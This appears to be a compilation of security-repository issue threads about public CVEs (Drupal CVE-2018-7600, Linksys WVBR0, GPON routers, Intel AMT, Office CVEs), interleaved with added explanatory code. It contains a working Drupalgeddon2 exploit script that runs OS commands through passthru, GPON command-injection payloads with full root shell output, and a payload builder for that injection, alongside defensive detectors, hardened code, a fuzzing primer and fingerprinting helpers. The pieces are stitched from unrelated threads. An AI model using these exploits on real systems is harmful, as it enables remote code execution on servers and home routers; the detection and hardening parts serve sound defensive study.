X-Generator: Drupal 8 (https://www.drupal.org)
X-Drupal-Ajax-Token: 1
Content-Length: 191
Connection: close
Content-Type: application/json

[{"command":"insert","method":"replaceWith","selector":null,"data":"21232f297a57a5a743894a0e4a801fc3  -\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C\/span\u003E","settings":null}]

"""

# sudo pip install requests


from __future__ import print_function

__all__ = ['exploit']
__author__ = [
    'a2u',   # module developer
    'Nixawk' # module Improved
]

import sys
import requests


def send_http_payload(drupal_home_url, php_func, php_func_param):
    """Exploit CVE-2018-7600 drupal: Unsanitized requests
    allow remote attackers to execute arbitrary code
    """
    
    params = {
        'element_parents': 'account/mail/#value',
        'ajax_form': 1,
        '_wrapper_format': 'drupal_ajax'
    }

    payload = {
        'form_id': 'user_register_form',
        '_drupal_ajax': '1',
        'mail[#type]': 'markup',
        'mail[#post_render][]': php_func,
        'mail[#markup]': php_func_param
    }

    # Clean URLs - Enabled
    url = requests.compat.urljoin(drupal_home_url, '/user/register')

    return requests.post(
        url,
        params=params,
        data=payload
    )


def check(drupal_home_url):
    """Check if the target is vulnerable to CVE-2018-7600.
    """
    status = False

    randflag = 'CVE-2018-7600'
    vulnflag = randflag + '[{"command":"insert"'
    response = send_http_payload(drupal_home_url, 'printf', randflag)
    if response and response.status_code == 200 and randflag in response.text:
        print("[*] %s is vulnerable" % drupal_home_url)
        status = True
    else:
        print("[?] %s is unknown" % drupal_home_url)

    return status


def exploit(drupal_home_url, php_exec_func='passthru', command='whoami'):
    """Execute os command.
    """
    response = send_http_payload(drupal_home_url, php_exec_func, command)
    if '[{"command":"insert"' in response.text:
        command_output, _ = response.text.split('[{"command":"insert"')
        print(command_output)


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: python %s <drupal-home-url> <cmd>" % sys.argv[0])
        sys.exit(0)

    exploit(sys.argv[1], command=sys.argv[2])

References
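The request in the docstring above carries Form API render properties (`mail[#post_render][]=exec`) inside ordinary user input; the fix shipped in Drupal 7.58 / 8.5.1 strips every input key that begins with `#` before the form system sees it. What follows is an added example, not code from this issue or from the labs repository: a small Python checker that applies that same rule to a captured request target and body, flagging `#`-prefixed key segments (with the ones that are render callbacks called out) and the `drupal_ajax` path the public exploit uses. The sample requests are constructed for the example; the first is the request shown in the docstring above.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Form API properties that the renderer invokes as callbacks. Any of them
# arriving as user input is the CVE-2018-7600 pattern; the fix removes every
# input key beginning with '#', so plain '#'-keys are reported as well.
CALLBACK_PROPERTIES = {"#post_render", "#pre_render", "#lazy_builder",
                       "#access_callback", "#process", "#element_validate",
                       "#submit", "#validate"}

_BRACKET = re.compile(r"\[([^\]]*)\]")


def key_segments(name):
    """'mail[#post_render][]' -> ['mail', '#post_render', '']."""
    return [name.split("[", 1)[0]] + _BRACKET.findall(name)


def hash_keys(pairs):
    """Every key segment that starts with '#' in a list of (name, value) pairs."""
    return [seg for name, _ in pairs for seg in key_segments(name)
            if seg.startswith("#")]


def inspect_request(target, body=""):
    """Classify one request (target = path + query string). Returns (suspicious, reasons)."""
    query = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    form = parse_qsl(body, keep_blank_values=True)
    reasons = []
    for where, pairs in (("query", query), ("body", form)):
        for key in hash_keys(pairs):
            kind = "callback" if key in CALLBACK_PROPERTIES else "hash-key"
            reasons.append("%s: %s %s" % (where, kind, key))
    # The AJAX route used by the exploit: element_parents pointing at a '#' property.
    q = dict(query)
    if "#" in q.get("element_parents", "") and q.get("_wrapper_format") == "drupal_ajax":
        reasons.append("query: element_parents selects a # property via drupal_ajax")
    return bool(reasons), reasons


# Constructed samples; the first is the request from the docstring above.
SAMPLES = [
    ("/user/register?element_parents=account%2Fmail%2F%23value&ajax_form=1&_wrapper_format=drupal_ajax",
     "form_id=user_register_form&_drupal_ajax=1&mail%5B%23type%5D=markup"
     "&mail%5B%23post_render%5D%5B%5D=exec&mail%5B%23markup%5D=printf admin | md5sum"),
    ("/user/register", "form_id=user_register_form&mail=alice%40example.com&name=alice"),
]

if __name__ == "__main__":
    for target, body in SAMPLES:
        flagged, why = inspect_request(target, body)
        print("SUSPICIOUS" if flagged else "ok", target, why)
```

Run over an access log or a WAF capture, the `callback` reasons are the ones worth alerting on immediately; a bare `hash-key` hit from a browser is still abnormal, since no legitimate Drupal form field is named with a leading `#`.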

CVE-2017-0199

It does not seem to work or do anything. Please, what is the proper way of generating the .doc?

[Exploit] CVE-2017-17411 - Linksys WVBR0 25 Command Injection

Command Injection

echo "xxx.xxx.xxx.xxxUSER-AGENT" | md5sum
  • xxx.xxx.xxx.xxx is your IP.
  • USER-AGENT can be a command-injection string.

Send an HTTP request with a command-injection payload in the User-Agent header.

References

  1. https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair
  2. https://thehackernews.com/2017/12/directv-wvb-hack.html
  3. https://github.com/nixawk/labs/blob/master/CVE-2017-17411/exploit-CVE-2017-17411.py
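The injection works because the client address and the User-Agent are spliced into a shell command line: a header containing a closing double quote and a `;` ends the quoted word and starts a new command. Added example, not code from this issue, from the ZDI write-up or from the device: a Python reduction of that pattern next to a hardened version that never hands the header to a shell. The device's real script is not on this page, so the exact command line below is an assumption (it uses `printf` rather than `echo` so that no trailing newline is added and the two functions hash the same bytes); the injected header is constructed for the demonstration.

```python
import hashlib
import subprocess


def session_hash_vulnerable(client_ip, user_agent):
    """The unsafe construction: both values are interpolated into a shell
    command line, so header text becomes shell syntax. (Assumed shape of the
    device's script; printf instead of echo to avoid the trailing newline.)"""
    cmd = 'printf %%s "%s%s" | md5sum' % (client_ip, user_agent)
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def session_hash_safe(client_ip, user_agent):
    """Hardened form: hash the same bytes in-process. Header text is only
    ever data here, so there is nothing for it to break out of."""
    data = (client_ip + user_agent).encode("utf-8", "surrogateescape")
    return hashlib.md5(data).hexdigest()


# Constructed payload-style header: closes the quote, runs a command, reopens it.
INJECTED_UA = '"; echo INJECTED; echo "'

if __name__ == "__main__":
    print("vulnerable:", session_hash_vulnerable("192.168.1.2", INJECTED_UA))
    print("safe      :", session_hash_safe("192.168.1.2", INJECTED_UA))
```

With the injected header the vulnerable version prints `INJECTED` because `sh` ran three commands instead of one; the safe version returns a 32-character digest of exactly the bytes it was given. If an external tool really is required, pass the data on stdin via `subprocess.run(["md5sum"], input=data)` with no `shell=True`, which keeps the same property.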

[Exploit] CVE-2018-10562 GPON Home Routers RCE

$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /"
INFO:__main__:sending payload: 127.0.0.1;`echo BGgw;ls /;echo BGgw`;
diag_result = "ping -c 4 -s 64 127.0.0.1;BGgw
bin
boot
bootimg
dev
etc
home
include
initrd
lib
linuxrc
man
mnt
opt
proc
root
sbin
sys
tmp
uImage
usr
var
web
BGgw;

$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /bin/"
INFO:__main__:sending payload: 127.0.0.1;`echo BMXr;ls /bin/;echo BMXr`;
diag_result = "ping -c 4 -s 64 127.0.0.1;BMXr
Console
EthMgr
GponCLI
GponSLID
LogMgr
MecMgr
MiscMgr
NetMgr
PonMgr
Ssp
TimerMgr
VmrMgr
WebMgr
ash
brctl
busybox
cat
catv
chgrp
chmod
chown
conntrack
cp
date
dd
df
dmesg
dnsmasq
dropbear
dsp
echo
egrep
false
fgrep
grep
gunzip
gzip
hostname
ip
ipaddr
iplink
iproute
iprule
iptables
iptables-restore
iptables-save
iptables-xml
iptunnel
kill
ln
ls
lsof
lspci
mReport
mkdir
mknod
mktemp
mount
mountpoint
mv
netstat
nice
ntpclient
pidof
ping
printenv
ps
pure-ftpd
pwd
rm
rmdir
sed
sh
sleep
stat
stty
sync
tar
tc
telnetd
touch
tr069Mgr
true
ttcp
umount
uname
usleep
vi
zcat
BMXr;

";

$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /sbin/"
INFO:__main__:sending payload: 127.0.0.1;`echo rXVS;ls /sbin/;echo rXVS`;
diag_result = "ping -c 4 -s 64 127.0.0.1;rXVS
arp
ath_wifi.sh
ath_wifi_aquila.sh
ez-ipupdate
fget
format
gdbnfs
halt
hostapd
ifconfig
ifrename
init
insmod
iwconfig
iwevent
iwgetid
iwlist
iwpriv
iwspy
logread
lsmod
memshow
modprobe
nbtscan
nfsstart
ntfs-3g
poweroff
pppd
pppoe
pppoe-config
pppoe-connect
pppoe-stop
reboot
repeater_pass_configuration
rg_setup.sh
rmmod
route
scsi_id
setup.sh
sysctl
syslogd
udev
udev_volume_id
udevd
udevsend
udevstart
udhcpc
upnpd
vconfig
wifi_cb
wifi_test
wlanconfig
wpatalk
rXVS;


$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ps"
INFO:__main__:sending payload: 127.0.0.1;`echo TFGQ;ps;echo TFGQ`;
diag_result = "ping -c 4 -s 64 127.0.0.1;TFGQ
  PID  Uid        VSZ Stat Command
    1 root       1136 S   init
    2 root            SWN [ksoftirqd/0]
    3 root            SW< [events/0]
    4 root            SW< [khelper]
    5 root            SW< [kthread]
   20 root            SW< [kblockd/0]
   23 root            SW< [khubd]
   40 root            SW  [pdflush]
   41 root            SW  [pdflush]
   42 root            SW< [kswapd0]
   43 root            SW< [aio/0]
   79 root            SW  [mtdblockd]
  183 root            SWN [jffs2_gcd_mtd1]
  187 root       1132 S   syslogd
  193 root        724 S < udevd
  407 root            SW< [voshwtimer/0]
  470 root       2116 S   /bin/GponCLI
  473 root       1808 S   /bin/telnetd
  476 root       1288 S   /bin/dropbear
  477 root       2116 S   /bin/GponCLI --script
  478 root       2116 S   /bin/GponCLI --hook
  479 root       1832 S   Ssp
  480 root       1832 S   Ssp
  481 root       1832 S < Ssp
  482 root       1856 S < /bin/TimerMgr -p 10 -s 0
  483 root       1856 S < /bin/TimerMgr -p 10 -s 0
  484 root       1856 S < /bin/TimerMgr -p 10 -s 0
  485 root       2836 S   /bin/LogMgr -p 20 -s 0
  486 root       2300 S   /bin/MiscMgr -p 20 -s 0
  496 root       3624 S   /bin/PonMgr -p 20 -s 0
  497 root       2308 S   /bin/NetMgr -p 20 -s 0
  550 root       3604 S < /bin/VmrMgr -p 10 -s 0
  551 root       3604 S < /bin/VmrMgr -p 10 -s 0
  552 root       3604 S < /bin/VmrMgr -p 10 -s 0
  553 root       3968 S   /bin/EthMgr -p 20 -s 0
  554 root       6360 S   /bin/tr069Mgr -p 20 -s 0
  573 root       6360 S   /bin/tr069Mgr -p 20 -s 0
  574 root       6360 S < /bin/tr069Mgr -p 20 -s 0
  575 root       6360 S < /bin/tr069Mgr -p 20 -s 0
  576 root       6360 S < /bin/tr069Mgr -p 20 -s 0
  577 root       2332 S   /bin/WebMgr -p 20 -s 0
  580 root       6336 S   /bin/MecMgr -p 20 -s 0
  607 root       3624 D   /bin/PonMgr -p 20 -s 0
  608 root       3624 S   /bin/PonMgr -p 20 -s 0
  609 root       3624 D < /bin/PonMgr -p 20 -s 0
  684 root       2308 S   /bin/NetMgr -p 20 -s 0
  685 root       2308 S   /bin/NetMgr -p 20 -s 0
  692 root       3604 S < /bin/VmrMgr -p 10 -s 0
  695 root            SW< [voip isr/0]
  698 root       3604 S < /bin/VmrMgr -p 10 -s 0
  701 root            SW< [TAPIevents/0]
  709 root            SW  [TAPIdxt_int]
  711 root       3604 S < /bin/VmrMgr -p 10 -s 0
  720 root       6336 S   /bin/MecMgr -p 20 -s 0
  722 root            SW< [brdg_wkq/0]
  996 root       1140 S   /bin/sh /sbin/pppoe-connect 0
 1005 root       1412 S   /sbin/pppd pty /sbin/pppoe -p /var/run/pppoe0.pid.ppp
 1006 root       1132 S   sh -c /sbin/pppoe -p /var/run/pppoe0.pid.pppoe -I wan
 1007 nobody      600 S   /sbin/pppoe -p /var/run/pppoe0.pid.pppoe -I wan0 -T 8
 1032 nobody      812 S   dnsmasq -6 /bin/mReport -C /tmp/dnsmasq.cfg -K
 1033 root        800 S   dnsmasq -6 /bin/mReport -C /tmp/dnsmasq.cfg -K
 1216 root       1320 S   upnpd ppp0 br0
 1217 root       1320 S   upnpd ppp0 br0
 1218 root       1320 S   upnpd ppp0 br0
 1220 root       1320 S   upnpd ppp0 br0
 1221 root       1320 S   upnpd ppp0 br0
 1222 root       1320 S   upnpd ppp0 br0
 1224 root       1320 S   upnpd ppp0 br0
 1226 root       1320 S   upnpd ppp0 br0
 1228 root       1320 S   upnpd ppp0 br0
 1229 root       1320 S   upnpd ppp0 br0
 1315 root       1240 S   hostapd -B /tmp/hostapd.conf
 6834 root       2332 S   /bin/WebMgr -p 20 -s 0
 8360 root       2332 S   /bin/WebMgr -p 20 -s 0
 8363 root       1132 S   sh -c echo "ping -c 4 -s 64 127.0.0.1;`echo TFGQ;ps;e
 8364 root       1132 S   sh -c echo "ping -c 4 -s 64 127.0.0.1;`echo TFGQ;ps;e
 8365 root       1136 R   ps
TFGQ;

";


$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /web/"
INFO:__main__:sending payload: 127.0.0.1;`echo Rbfg;ls /web/;echo Rbfg`;
diag_result = "ping -c 4 -s 64 127.0.0.1;Rbfg
html
Rbfg;

";

$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /web/html/"
INFO:__main__:sending payload: 127.0.0.1;`echo dZad;ls /web/html/;echo dZad`;
diag_result = "ping -c 4 -s 64 127.0.0.1;dZad
backup.html
ddns.html
devinfo.html
diag.html
dmz_alg.html
dns_host.html
download
error.html
firewall.html
images
index.html
init.html
ip_filter.html
lan.html
landev.html
language.html
laninfo.html
log.html
login.html
login_spa.html
logo.html
logout.html
mac_filter.html
menu.html
nat.html
nat_portforwarding.html
ntp.html
password.html
poninfo.html
reboot.html
rebooting.html
route.html
script
slid.html
style
tab.html
template
tr069.html
upgrade.html
upnp.html
usb.html
wan.html
waninfo.html
wifi.html
dZad;

";
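Two things are visible in the runs above. The payload wraps the command in backticks and brackets it with `echo MARKER` so its output can be cut out of the surrounding ping text, and the `ps` listing shows the device running `sh -c echo "ping -c 4 -s 64 127.0.0.1;`echo TFGQ;ps;e...`: the target host is embedded in a double-quoted string, where backtick substitution is still evaluated by the shell, which is why the backticks rather than the `;` are what run the command. Added example, not the exploit script from the repository: Python helpers that build a payload in that shape and cut the command output back out of the `diag_result = "...";` text, run against a constructed response modelled on the first listing above. The HTTP request that delivers the value is not shown on this page and is not reproduced here.

```python
import random
import re
import string

_DIAG_RESULT = re.compile(r'diag_result\s*=\s*"(.*?)";', re.S)


def make_marker(rng=random, length=4):
    """Four random letters, like BGgw / TFGQ in the runs above."""
    return "".join(rng.choice(string.ascii_letters) for _ in range(length))


def build_payload(command, marker, host="127.0.0.1"):
    """Target-host value in the shape the log shows:
    127.0.0.1;`echo MARK;CMD;echo MARK`;
    The backticks do the work: command substitution is evaluated even inside
    the double quotes the device wraps the ping line in."""
    return "%s;`echo %s;%s;echo %s`;" % (host, marker, command, marker)


def parse_diag_result(page):
    """Pull the diag_result string literal out of the returned page, or None."""
    m = _DIAG_RESULT.search(page)
    return m.group(1) if m else None


def extract_output(diag_result, marker):
    """Lines between the two marker echoes; None if the marker pair is missing
    (command did not run, or the response was not a diag result at all)."""
    first = diag_result.find(marker)
    if first < 0:
        return None
    start = first + len(marker)
    end = diag_result.find(marker, start)
    if end < 0:
        return None
    segment = diag_result[start:end].strip("\n")
    return segment.split("\n") if segment else []


# Constructed response modelled on the first run above (ls /, marker BGgw);
# the surrounding <script>/var wrapper is an assumption, not from the page.
SAMPLE_PAGE = ('<script>\nvar diag_result = "ping -c 4 -s 64 127.0.0.1;BGgw\n'
               'bin\nboot\netc\nweb\nBGgw;\n\n";\n</script>')

if __name__ == "__main__":
    marker = make_marker()
    print("payload:", build_payload("ls /", marker))
    print("output :", extract_output(parse_diag_result(SAMPLE_PAGE), "BGgw"))
```

A fresh marker per request keeps the parser honest: the `ping` banner and any stale `diag_result` from an earlier run cannot be mistaken for this command's output, and a `None` from `extract_output` is the signal that the substitution did not execute.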

[Question] Fuzzing

AFL

- https://en.wikipedia.org/wiki/Fuzzing
- https://en.wikipedia.org/wiki/Fuzz_testing
- http://lcamtuf.coredump.cx/afl/
- http://lcamtuf.coredump.cx/afl/demo/
- http://lcamtuf.coredump.cx/afl/QuickStartGuide.txt
- http://lcamtuf.coredump.cx/afl/#bugs
- http://lcamtuf.coredump.cx/afl/README.txt
- http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz
- http://lcamtuf.coredump.cx/afl/technical_details.txt

- http://lcamtuf.blogspot.com/2014/08/binary-fuzzing-strategies-what-works.html
- http://lcamtuf.blogspot.com/2014/10/fuzzing-binaries-without-execve.html
- http://lcamtuf.blogspot.com/2014/11/pulling-jpegs-out-of-thin-air.html
- http://lcamtuf.blogspot.com/2014/11/afl-fuzz-crash-exploration-mode.html
- http://lcamtuf.blogspot.com/2015/01/afl-fuzz-making-up-grammar-with.html
- http://lcamtuf.blogspot.com/2015/04/finding-bugs-in-sqlite-easy-way.html
- http://lcamtuf.blogspot.com/2016/02/say-hello-to-afl-analyze.html

- https://groups.google.com/d/msg/afl-users/eWb2PgjLnUo/8AKqadYzSBoJ
- https://groups.google.com/forum/#!topic/afl-users/RW4RF6x9aBc

- https://github.com/secfigo/Awesome-Fuzzing
- http://llvm.org/docs/LibFuzzer.html
- http://honggfuzz.com/
- https://github.com/aoh/radamsa

- https://www.youtube.com/watch?v=29RbO5bftwo
- https://www.evilsocket.net/2015/04/30/fuzzing-with-afl-fuzz-a-practical-example-afl-vs-binutils/
- https://labsblog.f-secure.com/2017/06/22/super-awesome-fuzzing-part-one/
- http://thecyberrecce.net/2017/03/20/software-exploit-development-fuzzing-with-afl/
- https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/project-triforce-run-afl-on-everything/
- https://www.fastly.com/blog/how-fuzz-server-american-fuzzy-lop
- https://www.reddit.com/r/fuzzing/
- https://animal0day.blogspot.jp/2017/05/fuzzing-apache-httpd-server-with.html
- https://animal0day.blogspot.jp/2017/07/
- https://sensepost.com/blog/2017/fuzzing-apache-httpd-server-with-american-fuzzy-lop-%2B-persistent-mode/
- https://foxglovesecurity.com/2016/03/15/fuzzing-workflows-a-fuzz-job-from-start-to-finish/
- http://research.aurainfosec.io/hunting-for-bugs-101/
- http://paper.seebug.org/323/

$ CC="afl-clang-fast" CFLAGS="-fsanitize=address -ggdb" CXXFLAGS="-fsanitize=address -ggdb" ./configure
$ make

fuzzing
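The links above cover AFL's deterministic and havoc stages (bit flips, arithmetic, interesting values, byte insertion and deletion), and the build line compiles the target with afl-clang-fast and ASan so that memory errors turn into crash reports. As an added illustration that is not from the original post or from AFL itself, here is a minimal Python mutation fuzzer that uses those operators against a constructed length-prefixed record parser with a deliberately missing bounds check. It has no coverage feedback, which is exactly the part AFL's compile-time instrumentation adds; an unhandled exception here plays the role of the SIGSEGV or ASan report a native target would produce.

```python
import random


def parse_records(data):
    """Constructed target: length-prefixed records, with the bug that the
    length byte is trusted and never checked against the bytes remaining."""
    records, i = [], 0
    while i < len(data):
        length = data[i]
        record = bytes(data[i + 1 + j] for j in range(length))   # BUG: IndexError past the end
        records.append(record)
        i += 1 + length
    return records


INTERESTING_8 = [0, 1, 0x7F, 0x80, 0xFF]   # subset of AFL's "interesting" 8-bit values
ARITH_MAX = 35                             # AFL's bound for the arithmetic stage


def mutate(seed, rng):
    """One havoc-style case: stack 1..4 of the deterministic-stage operators."""
    buf = bytearray(seed)
    for _ in range(rng.randint(1, 4)):
        op = rng.randrange(5)
        if op == 0:                                       # single bit flip
            i = rng.randrange(len(buf))
            buf[i] ^= 1 << rng.randrange(8)
        elif op == 1:                                     # arithmetic +/- 1..ARITH_MAX
            i = rng.randrange(len(buf))
            buf[i] = (buf[i] + rng.randint(-ARITH_MAX, ARITH_MAX)) & 0xFF
        elif op == 2:                                     # overwrite with an interesting value
            i = rng.randrange(len(buf))
            buf[i] = rng.choice(INTERESTING_8)
        elif op == 3 and len(buf) > 1:                    # delete a byte (never empties the buffer)
            del buf[rng.randrange(len(buf))]
        else:                                             # insert a random byte
            buf.insert(rng.randrange(len(buf) + 1), rng.randrange(256))
    return bytes(buf)


def fuzz(target, seeds, iterations, rng_seed=1):
    """Run mutated cases until the target raises. Returns (iteration, case,
    exception) for the first crash, or None if none was found."""
    rng = random.Random(rng_seed)
    for n in range(iterations):
        case = mutate(rng.choice(seeds), rng)
        try:
            target(case)
        except Exception as exc:
            return n, case, exc
    return None


SEEDS = [b"\x02ab\x01c\x03def"]   # constructed corpus: three valid records

if __name__ == "__main__":
    hit = fuzz(parse_records, SEEDS, 10000)
    print("no crash" if hit is None else "crash after %d cases: %r -> %r" % hit)
```

The crashing input is found within a handful of cases because any operator that raises a length byte past the bytes that follow it triggers the bug; with real targets the interesting work is minimising that case (`afl-tmin`) and then deciding whether the out-of-bounds read is exploitable.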

[Links] MS17-010

How can I reproduce this vulnerability?

I noticed there is an HTTP link, hyoeyeep.ws, and I modified the hosts file to point this domain to a local server. On the server, I put template.doc and changed its Content-Type to application/hta. I opened the bin file as .doc or .rtf, but nothing happened. Which step did I miss?

Potential false negative with the CVE-2017-5689.py script

You may get a false negative with the current script:

  1. The AMT web interface could be disabled while only WS-MAN is enabled.
  2. On Kaby Lake and Skylake systems with AMT 11.x, the Server field in the HTTP response won't match what you have in your script.

See the example below of sending a WS-MAN request to get the AMT FW Core Version, and how the HTTP response with the Server field looks.

POST /wsman HTTP/1.1
Content-Length: 1543
Connection: close
User-Agent: Mozilla/5.0 
Host: 134.134.134.134

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:tns="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_SoftwareIdentity" xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:wsman="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:wscat="http://schemas.xmlsoap.org/ws/2005/06/wsmancat" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:wse="http://schemas.xmlsoap.org/ws/2004/08/eventing" xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" xmlns:wsen="http://schemas.xmlsoap.org/ws/2004/09/enumeration">
  <soap:Header>
    <wsa:To>http://134.134.134.134:16992/wsman</wsa:To>
    <wsa:ReplyTo>
      <wsa:Address soap:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:Address>
    </wsa:ReplyTo>
    <wsa:Action soap:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Get</wsa:Action>
    <wsman:MaxEnvelopeSize soap:mustUnderstand="true">51200</wsman:MaxEnvelopeSize>
    <wsa:MessageID>uuid:72426165-3612-0436-6450-103681140543</wsa:MessageID>
    <wsman:ResourceURI soap:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_SoftwareIdentity</wsman:ResourceURI>
    <wsman:SelectorSet>
      <wsman:Selector Name="InstanceID">AMT FW Core Version</wsman:Selector>
    </wsman:SelectorSet>
    <wsman:OperationTimeout>PT60.000S</wsman:OperationTimeout>
  </soap:Header>
  <soap:Body />
</soap:Envelope>

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Digest realm="Digest:30D40000000000000000000000000000", nonce="zm8DAAsfAAAKg62FIMR9haAOe9Ix13A6",stale="false",qop="auth"
Content-Type: text/html
Server: AMT
Content-Length: 690
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<html><head><link rel=stylesheet href=/styles.css>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Intel&reg; Active Management Technology</title></head>
<body>
<table class=header>
<tr><td valign=top nowrap>
<p class=top1>Intel<font class=r><sup>&reg;</sup></font> Active Management Technology
<td valign="top"><img src="logo.gif" align="right" alt="Intel">
</table>
<br />
<h2 class=warn>Log on failed. Incorrect user name or password, or user account temporarily locked.</h2>

<p>
<form METHOD="GET" action="index.htm"><h2><input type=submit value="Try again">
</h2></form>
<p>

</body>
</html>
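Both false-negative cases above come down to fingerprinting on a single string from a single endpoint. Added example, not the repository's CVE-2017-5689.py: a Python classifier that looks at a raw HTTP response for several AMT indicators at once (the bare `Server: AMT` header from the WS-MAN reply above, the older `Intel(R) Active Management Technology` Server string, the `Digest:<32 hex>` realm seen in that reply, and the branded error page), so a probe of `/wsman` on 16992/16993 can still be recognised when the web UI is off. The WS-MAN 401 is the response quoted above with its body shortened; the older-firmware and nginx responses are constructed samples, and the version string in the older one is an assumption.

```python
import re

AMT_SERVER_PREFIXES = ("AMT", "Intel(R) Active Management Technology")
AMT_REALM = re.compile(r'realm="Digest:[0-9A-Fa-f]{32}"')


def parse_response(raw):
    """Split a raw HTTP/1.1 response into (status, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def amt_indicators(raw):
    """Every AMT fingerprint present in the response; an empty list means no match."""
    status, headers, body = parse_response(raw)
    found = []
    server = headers.get("server", "")
    if server.startswith(AMT_SERVER_PREFIXES):
        found.append("Server: " + server)
    if status == 401 and AMT_REALM.search(headers.get("www-authenticate", "")):
        found.append("Digest realm of the form Digest:<32 hex>")
    if "Active Management Technology" in body:
        found.append("AMT branding in body")
    return found


def _resp(status_line, headers, body=""):
    return "\r\n".join([status_line] + headers) + "\r\n\r\n" + body


# The /wsman reply from the report above (headers as shown, body shortened).
WSMAN_401 = _resp("HTTP/1.1 401 Unauthorized", [
    'WWW-Authenticate: Digest realm="Digest:30D40000000000000000000000000000", '
    'nonce="zm8DAAsfAAAKg62FIMR9haAOe9Ix13A6",stale="false",qop="auth"',
    "Content-Type: text/html", "Server: AMT", "Connection: close"],
    "<html><head><title>Intel&reg; Active Management Technology</title></head></html>")

# Constructed: the older-firmware style Server string a version-matching script keys on.
OLD_UI_401 = _resp("HTTP/1.1 401 Unauthorized", [
    "Server: Intel(R) Active Management Technology 9.1.30",
    'WWW-Authenticate: Digest realm="Digest:0123456789ABCDEF0123456789ABCDEF", '
    'nonce="x", stale="false", qop="auth"'])

# Constructed: an unrelated web server that should not match.
NGINX_404 = _resp("HTTP/1.1 404 Not Found",
                  ["Server: nginx", "Content-Type: text/html"], "<h1>404</h1>")

if __name__ == "__main__":
    for name, raw in (("wsman", WSMAN_401), ("old-ui", OLD_UI_401), ("nginx", NGINX_404)):
        print(name, amt_indicators(raw))
```

Treat any non-empty result as "AMT present" and only then try to determine the firmware version; a scanner that needs the version string before it will report anything is what produces the silent miss described in the issue.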

[Analysis] CVE-2015-2545

exploit-000

plugin-002

plugin-003

igfx-002

*** wait with pending attach

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       SRV*C:\Symbols*http://msdl.microsoft.com/download/symbols
Symbol search path is: SRV*C:\Symbols*http://msdl.microsoft.com/download/symbols
Executable search path is: 
ModLoad: 2fe80000 2fee6000   C:\Program Files\Microsoft Office\Office12\WINWORD.EXE
ModLoad: 77570000 776ac000   C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 77350000 77424000   C:\Windows\system32\kernel32.dll
ModLoad: 75880000 758ca000   C:\Windows\system32\KERNELBASE.dll
ModLoad: 76390000 76430000   C:\Windows\system32\ADVAPI32.dll
ModLoad: 760d0000 7617c000   C:\Windows\system32\msvcrt.dll
ModLoad: 76450000 76469000   C:\Windows\SYSTEM32\sechost.dll
ModLoad: 76180000 76221000   C:\Windows\system32\RPCRT4.dll
ModLoad: 6c660000 6c6fb000   C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dll
ModLoad: 755b0000 755fc000   C:\Windows\system32\apphelp.dll
ModLoad: 6d390000 6d40b000   C:\Windows\AppPatch\AcSpecfc.DLL
ModLoad: 75590000 755ab000   C:\Windows\system32\SspiCli.dll
ModLoad: 6f1e0000 6f264000   C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\COMCTL32.dll
ModLoad: 76240000 7628e000   C:\Windows\system32\GDI32.dll
ModLoad: 76290000 76359000   C:\Windows\system32\USER32.dll
ModLoad: 75b60000 75b6a000   C:\Windows\system32\LPK.dll
ModLoad: 75f60000 75ffd000   C:\Windows\system32\USP10.dll
ModLoad: 70260000 702d9000   C:\Windows\system32\mscms.dll
ModLoad: 74d40000 74d57000   C:\Windows\system32\USERENV.dll
ModLoad: 75680000 7568b000   C:\Windows\system32\profapi.dll
ModLoad: 776c0000 77717000   C:\Windows\system32\SHLWAPI.dll
ModLoad: 75cf0000 75e4c000   C:\Windows\system32\ole32.dll
ModLoad: 76700000 7734a000   C:\Windows\system32\SHELL32.dll
ModLoad: 739c0000 739f2000   C:\Windows\system32\WINMM.dll
ModLoad: 6c820000 6c907000   C:\Windows\system32\DDRAW.dll
ModLoad: 744d0000 744d6000   C:\Windows\system32\DCIMAN32.dll
ModLoad: 759c0000 75b5d000   C:\Windows\system32\SETUPAPI.dll
ModLoad: 75900000 75927000   C:\Windows\system32\CFGMGR32.dll
ModLoad: 76000000 7608f000   C:\Windows\system32\OLEAUT32.dll
ModLoad: 75860000 75872000   C:\Windows\system32\DEVOBJ.dll
